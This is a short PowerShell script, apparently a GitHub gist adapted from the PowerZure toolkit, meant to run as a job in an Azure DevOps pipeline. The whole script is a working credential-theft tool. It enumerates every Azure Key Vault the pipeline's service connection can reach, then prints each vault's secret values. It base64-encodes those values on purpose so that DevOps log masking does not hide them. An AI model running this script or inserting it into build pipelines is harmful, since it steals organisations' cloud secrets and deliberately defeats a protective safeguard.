#Somewhat stolen from PowerZure Get-AzureKeyVaultContent and Show-AzureKeyVaultContent , thanks hausec! | |
#reimplemented by Flangvik to run in a single "Azure PowerShell" Agent job, inside an DevOps Pipeline | |
#Suppress warnings for clean output | |
Set-Item Env:\SuppressAzurePowerShellBreakingChangeWarnings "true" | |
#Get all Azure KeyVaults from currently selected/scoped subscription | |
#This connection is known as an "Service connection",and in terms of accessing Azure resources, uses either Service principal or Managed identity | |
$vaults = Get-AzKeyVault | |
#Dump info about each vault | |
Write-Host "[+] Located $($vaults.Count) Azure KeyVault(s), dumping info" | |
ForEach($vault in $vaults) | |
{ | |
$vaultsname = $vault.VaultName | |
$Secrets = $Vault | Get-AzKeyVaultSecret | |
$Keys = $Vault | Get-AzKeyVaultKey | |
$Certificates = $Vault | Get-AzKeyVaultCertificate | |
$obj = New-Object -TypeName psobject | |
$obj | Add-Member -MemberType NoteProperty -Name VaultName -Value $vaultsname | |
$obj | Add-Member -MemberType NoteProperty -Name SecretName -Value $Secrets.Name | |
$obj | Add-Member -MemberType NoteProperty -Name SecretContentType -Value $Secrets.ContentType | |
$obj | Add-Member -MemberType NoteProperty -Name CertificateName -Value $Certificates.Name | |
$obj | Add-Member -MemberType NoteProperty -Name KeyName -Value $Keys.Name | |
$obj | Add-Member -MemberType NoteProperty -Name KeyEnabled -Value $Keys.Enabled | |
$obj | Add-Member -MemberType NoteProperty -Name KeyRecoveryLevel -Value $Keys.RecoveryLevel | |
$obj | convertto-json -depth 100 | |
} | |
#Dump base64 encoded secrets from each vault | |
#Encoding is needed as Azure DevOps will blank out any keys/secrets identified in logs with ****** | |
Write-Host "[+] Dumping Secrets from all KeyVaults found!" | |
ForEach($vault in $vaults) | |
{ | |
$Secrets = $vault | Get-AzKeyVaultSecret | |
ForEach($Secret in $Secrets) | |
{ | |
$Value = $vault | Get-AzKeyVaultSecret -name $Secret.name | |
$obj = New-Object -TypeName psobject | |
$obj | Add-Member -MemberType NoteProperty -Name SecretName -Value $Secret.Name | |
$obj | Add-Member -MemberType NoteProperty -Name SecretValue -Value $([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes( $Value.SecretValueText))) | |
$obj | Add-Member -MemberType NoteProperty -Name ContentType -Value $Value.ContentType | |
$obj | convertto-json -depth 100 | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment